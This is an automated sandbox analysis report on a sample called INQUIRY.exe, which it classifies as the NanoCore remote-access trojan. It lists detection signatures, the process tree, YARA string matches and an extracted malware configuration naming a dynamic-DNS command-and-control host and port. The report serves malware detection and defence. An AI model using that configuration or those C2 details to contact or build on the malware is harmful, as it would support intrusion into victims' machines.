Edit tour

Windows Analysis Report
INQUIRY.exe

Overview

General Information

Sample Name:	INQUIRY.exe
Analysis ID:	558450
MD5:	dc0acc75361bb39fbd4abec6edc82cd5
SHA1:	9e9c823725bee12d0980009c04692ad9089d9308
SHA256:	d73cbcb2d300d84618d476706765b185c12d20d2e52afe120fb587c81be7cc80
Infos:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Malicious sample detected (through community Yara rule)

Sigma detected: NanoCore

Detected Nanocore Rat

Yara detected Nanocore RAT

Detected unpacking (creates a PE file in dynamic memory)

Machine Learning detection for sample

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Uses dynamic DNS services

Uses 32bit PE files

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Detected TCP or UDP traffic on non-standard ports

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

INQUIRY.exe (PID: 6904 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)

INQUIRY.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\INQUIRY.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)

rstmgknbahw.exe (PID: 6472 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)

rstmgknbahw.exe (PID: 1904 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)

rstmgknbahw.exe (PID: 4296 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)

rstmgknbahw.exe (PID: 5320 cmdline: "C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe" MD5: DC0ACC75361BB39FBD4ABEC6EDC82CD5)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "b46b5964-4830-4c6b-9df5-a21557a1", "Group": "Default", "Domain1": "onyeoma.ddns.net", "Domain2": "127.0.0.1", "Port": 4141, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.735100285.0000000004940000.00000004.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1e6e5:$x1: NanoCore.ClientPluginHost 0x1e722:$x2: IClientNetworkHost 0x22255:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b88:$a: NanoCore 0x1e44d:$a: NanoCore 0x1e45d:$a: NanoCore 0x1e691:$a: NanoCore 0x1e6a5:$a: NanoCore 0x1e6e5:$a: NanoCore 0x1e4ac:$b: ClientPlugin 0x1e6ae:$b: ClientPlugin 0x1e6ee:$b: ClientPlugin 0x4f580:$b: ClientPlugin 0x5bc36:$b: ClientPlugin 0x5f608:$b: ClientPlugin 0x1e5d3:$c: ProjectData 0x1efda:$d: DESCrypto 0x269a6:$e: KeepAlive 0x24994:$g: LogClientMessage 0x20b8f:$i: get_Connected 0x1f310:$j: #=q 0x1f340:$j: #=q 0x1f35c:$j: #=q 0x1f38c:$j: #=q
00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000000.716081773.0000000000414000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x111e5:$x1: NanoCore.ClientPluginHost 0x11222:$x2: IClientNetworkHost 0x14d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000001.718977051.0000000000414000.00000040.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10f4d:$a: NanoCore 0x10f5d:$a: NanoCore 0x11191:$a: NanoCore 0x111a5:$a: NanoCore 0x111e5:$a: NanoCore 0x10fac:$b: ClientPlugin 0x111ae:$b: ClientPlugin 0x111ee:$b: ClientPlugin 0x110d3:$c: ProjectData 0x11ada:$d: DESCrypto 0x194a6:$e: KeepAlive 0x17494:$g: LogClientMessage 0x1368f:$i: get_Connected 0x11e10:$j: #=q 0x11e40:$j: #=q 0x11e5c:$j: #=q 0x11e8c:$j: #=q 0x11ea8:$j: #=q 0x11ec4:$j: #=q 0x11ef4:$j: #=q 0x11f10:$j: #=q
00000006.00000002.734941801.00000000027AE000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x196bb:$a: NanoCore 0x19714:$a: NanoCore 0x19751:$a: NanoCore 0x197ca:$a: NanoCore 0x1971d:$b: ClientPlugin 0x1975a:$b: ClientPlugin 0x1a058:$b: ClientPlugin 0x1a065:$b: ClientPlugin 0x10ef8:$e: KeepAlive 0x19ba5:$g: LogClientMessage 0x19b25:$i: get_Connected 0xb6ed:$j: #=q 0xb71d:$j: #=q 0xb759:$j: #=q 0xb781:$j: #=q 0xb7b1:$j: #=q 0xb7e1:$j: #=q 0xb811:$j: #=q 0xb841:$j: #=q 0xb85d:$j: #=q 0xb88d:$j: #=q
00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x123e5:$x1: NanoCore.ClientPluginHost 0x12422:$x2: IClientNetworkHost 0x15f55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1214d:$a: NanoCore 0x1215d:$a: NanoCore 0x12391:$a: NanoCore 0x123a5:$a: NanoCore 0x123e5:$a: NanoCore 0x121ac:$b: ClientPlugin 0x123ae:$b: ClientPlugin 0x123ee:$b: ClientPlugin 0x122d3:$c: ProjectData 0x12cda:$d: DESCrypto 0x1a6a6:$e: KeepAlive 0x18694:$g: LogClientMessage 0x1488f:$i: get_Connected 0x13010:$j: #=q 0x13040:$j: #=q 0x1305c:$j: #=q 0x1308c:$j: #=q 0x130a8:$j: #=q 0x130c4:$j: #=q 0x130f4:$j: #=q 0x13110:$j: #=q
00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42dbd:$a: NanoCore 0x42e16:$a: NanoCore 0x42e53:$a: NanoCore 0x42ecc:$a: NanoCore 0x56577:$a: NanoCore 0x5658c:$a: NanoCore 0x565c1:$a: NanoCore 0x6f023:$a: NanoCore 0x6f038:$a: NanoCore 0x6f06d:$a: NanoCore 0x42e1f:$b: ClientPlugin 0x42e5c:$b: ClientPlugin 0x4375a:$b: ClientPlugin 0x43767:$b: ClientPlugin 0x56333:$b: ClientPlugin 0x5634e:$b: ClientPlugin 0x5637e:$b: ClientPlugin 0x56595:$b: ClientPlugin 0x565ca:$b: ClientPlugin 0x6eddf:$b: ClientPlugin 0x6edfa:$b: ClientPlugin
00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.735022366.00000000037DA000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x42dbd:$a: NanoCore 0x42e16:$a: NanoCore 0x42e53:$a: NanoCore 0x42ecc:$a: NanoCore 0x56577:$a: NanoCore 0x5658c:$a: NanoCore 0x565c1:$a: NanoCore 0x6f023:$a: NanoCore 0x6f038:$a: NanoCore 0x6f06d:$a: NanoCore 0x42e1f:$b: ClientPlugin 0x42e5c:$b: ClientPlugin 0x4375a:$b: ClientPlugin 0x43767:$b: ClientPlugin 0x56333:$b: ClientPlugin 0x5634e:$b: ClientPlugin 0x5637e:$b: ClientPlugin 0x56595:$b: ClientPlugin 0x565ca:$b: ClientPlugin 0x6eddf:$b: ClientPlugin 0x6edfa:$b: ClientPlugin
00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000006.00000002.734234340.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x215e5:$x1: NanoCore.ClientPluginHost 0x21622:$x2: IClientNetworkHost 0x25155:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2135d:$x1: NanoCore Client.exe 0x215e5:$x2: NanoCore.ClientPluginHost 0x22c1e:$s1: PluginCommand 0x22c12:$s2: FileCommand 0x23ac3:$s3: PipeExists 0x2987a:$s4: PipeCreated 0x2160f:$s5: IClientLoggingHost
00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2134d:$a: NanoCore 0x2135d:$a: NanoCore 0x21591:$a: NanoCore 0x215a5:$a: NanoCore 0x215e5:$a: NanoCore 0x213ac:$b: ClientPlugin 0x215ae:$b: ClientPlugin 0x215ee:$b: ClientPlugin 0x214d3:$c: ProjectData 0x21eda:$d: DESCrypto 0x298a6:$e: KeepAlive 0x27894:$g: LogClientMessage 0x23a8f:$i: get_Connected 0x22210:$j: #=q 0x22240:$j: #=q 0x2225c:$j: #=q 0x2228c:$j: #=q 0x222a8:$j: #=q 0x222c4:$j: #=q 0x222f4:$j: #=q 0x22310:$j: #=q
00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x196bb:$a: NanoCore 0x19714:$a: NanoCore 0x19751:$a: NanoCore 0x197ca:$a: NanoCore 0x1971d:$b: ClientPlugin 0x1975a:$b: ClientPlugin 0x1a058:$b: ClientPlugin 0x1a065:$b: ClientPlugin 0x10ef8:$e: KeepAlive 0x19ba5:$g: LogClientMessage 0x19b25:$i: get_Connected 0xb6ed:$j: #=q 0xb71d:$j: #=q 0xb759:$j: #=q 0xb781:$j: #=q 0xb7b1:$j: #=q 0xb7e1:$j: #=q 0xb811:$j: #=q 0xb841:$j: #=q 0xb85d:$j: #=q 0xb88d:$j: #=q
00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x251e5:$x1: NanoCore.ClientPluginHost 0x25222:$x2: IClientNetworkHost 0x28d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x24f5d:$x1: NanoCore Client.exe 0x251e5:$x2: NanoCore.ClientPluginHost 0x2681e:$s1: PluginCommand 0x26812:$s2: FileCommand 0x276c3:$s3: PipeExists 0x2d47a:$s4: PipeCreated 0x2520f:$s5: IClientLoggingHost
00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x24f4d:$a: NanoCore 0x24f5d:$a: NanoCore 0x25191:$a: NanoCore 0x251a5:$a: NanoCore 0x251e5:$a: NanoCore 0x24fac:$b: ClientPlugin 0x251ae:$b: ClientPlugin 0x251ee:$b: ClientPlugin 0x250d3:$c: ProjectData 0x25ada:$d: DESCrypto 0x2d4a6:$e: KeepAlive 0x2b494:$g: LogClientMessage 0x2768f:$i: get_Connected 0x25e10:$j: #=q 0x25e40:$j: #=q 0x25e5c:$j: #=q 0x25e8c:$j: #=q 0x25ea8:$j: #=q 0x25ec4:$j: #=q 0x25ef4:$j: #=q 0x25f10:$j: #=q
